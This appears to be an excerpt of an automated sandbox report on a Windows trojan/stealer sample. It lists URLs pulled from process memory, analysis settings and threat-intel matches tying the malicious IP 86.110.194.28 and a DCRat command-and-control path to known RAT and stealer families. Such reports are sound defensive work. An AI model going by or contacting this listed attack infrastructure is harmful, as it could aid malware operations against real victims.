                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001334E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013696000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001357E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013394000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013308000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C43000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A9F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B2B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BB7000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135C4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134AC000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C89000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001360A000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013538000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BFD000.00000004.00000800.00020000.00000000.sdmp, 
wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013466000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013420000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001316D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, 
wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2513469202.000001BD9BD83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPleasewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fonts.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sandoll.co.krwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.microsoft.cpowershell.exe, 00000001.00000002.2676516036.000001BDA4085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.urwpp.deDPleasewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.zhongyicts.com.cnwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.sakkal.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://86.110.HwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2513469202.000001BD9BE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icownWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.micpowershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.micJpowershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                            high
                                                                                                            http://crl.ver)svchost.exe, 00000013.00000002.2903834268.000001F814200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001355D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C22000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133FF000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B96000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136BB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013701000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C68000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013192000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133B9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135E9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013675000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001362F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
00000010.00000002.2964741732.000000001348B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CAE000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134D1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013445000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001332D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, 
wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brwyPcM5nqV0.16.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.carterandcone.comlwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
IP | Domain | Country | ASN | ASN Name | Malicious
86.110.194.28 | unknown | Russian Federation | 208861 | RACKTECHRU | true
                                                                                                                                              IP
                                                                                                                                              127.0.0.1
                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1583651
                                                                                                                                              Start date and time:2025-01-03 09:06:05 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 9m 28s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:23
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:zZ1Y43bxxV.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:cdac978772a7616686c0efe2727ce902.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@27/377@0/2
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 28.6%
                                                                                                                                              HCA Information:Failed
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1012 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2916 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4192 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6036 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:06:59 | API Interceptor | 161x Sleep call for process: powershell.exe modified
03:07:13 | API Interceptor | 490377x Sleep call for process: wnWNWNYIxJtFiUSDRXunzX.exe modified
03:07:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
86.110.194.28 | updIMdPUj8.exe | malicious | DCRat | 86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php
                                                                                                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RACKTECHRU | updIMdPUj8.exe | malicious | DCRat | 86.110.194.28
 | jew.sh4.elf | malicious | Unknown | 91.223.144.119
 | la.bot.mipsel.elf | malicious | Unknown | 193.38.236.134
 | oyCvLcfl3R.exe | malicious | XenoRAT | 194.113.106.81
 | qsKo.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
 | GsrDwm0DJG.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
 | HeggBkMoYE.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
 | b2J6hgvd51.elf | malicious | Unknown | 45.128.232.191
 | TbFoReHi2v.elf | malicious | Mirai | 45.128.232.235
 | gmA11dfzc2.elf | malicious | Mirai | 45.128.232.235
                                                                                                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\Desktop\ASylWHNt.log | VqGD18ELBM.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | updIMdPUj8.exe | malicious | DCRat |
 | t8F7Ic986c.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 544WP3NHaP.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 1znAXdPcM5.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT |
